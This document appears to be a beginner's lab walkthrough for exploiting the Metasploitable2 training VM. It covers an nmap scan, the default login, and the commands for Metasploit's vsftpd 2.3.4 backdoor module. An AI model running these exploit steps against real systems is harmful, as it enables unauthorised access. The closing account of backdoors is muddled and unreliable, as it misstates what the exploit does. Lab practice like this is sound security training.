Metasploitable2 VM Testing

Metasploitable2 is a purposefully vulnerable virtual machine for controlled security testing. The system is isolated using a host-only network to ensure all testing remains within the local lab environment. This setup allows for safe exploitation for educational purposes.

Requirements

1. Attacker VM (e.g., Kali)
2. Metasploitable2 VM
3. Ensure both are running with a Host-Only network configuration.

Steps

1. Run the Kali VM as the Attacker

2. Run the Metasploitable2 VM

3. Log in to Metasploitable2

   Username: msfadmin

   Password: msfadmin

   

4. Check the Metasploitable2 IP

   ip a

   

5. Test Ping from the Kali attacker

   

6. Test Nmap to Metasploitable

   

   You'll see many open ports, because Metasploitable2 is designed to be vulnerable.

7. FTP Exploit Test

   1. Check FTP version

      nmap -sV 192.168.56.103 -p 21

      

   2. Exploit with Metasploit framework

      Search vsftpd 2.3.4

      

      There is a backdoor module specifically for this FTP version in the Metasploit framework.

   3. Run the module

      use exploit/unix/ftp/vsftpd_234_backdoor

      

      Set RHOST 192.168.56.103

      run

      

   The backdoor is now present in the Metasploit system. A backdoor is a hidden way to gain access to a system without using a normal login. Previously, this access was used by system developers to make it easier for them to upgrade or repair the system without having to bypass access restrictions. However, backdoors have now been removed from most systems due to security risks.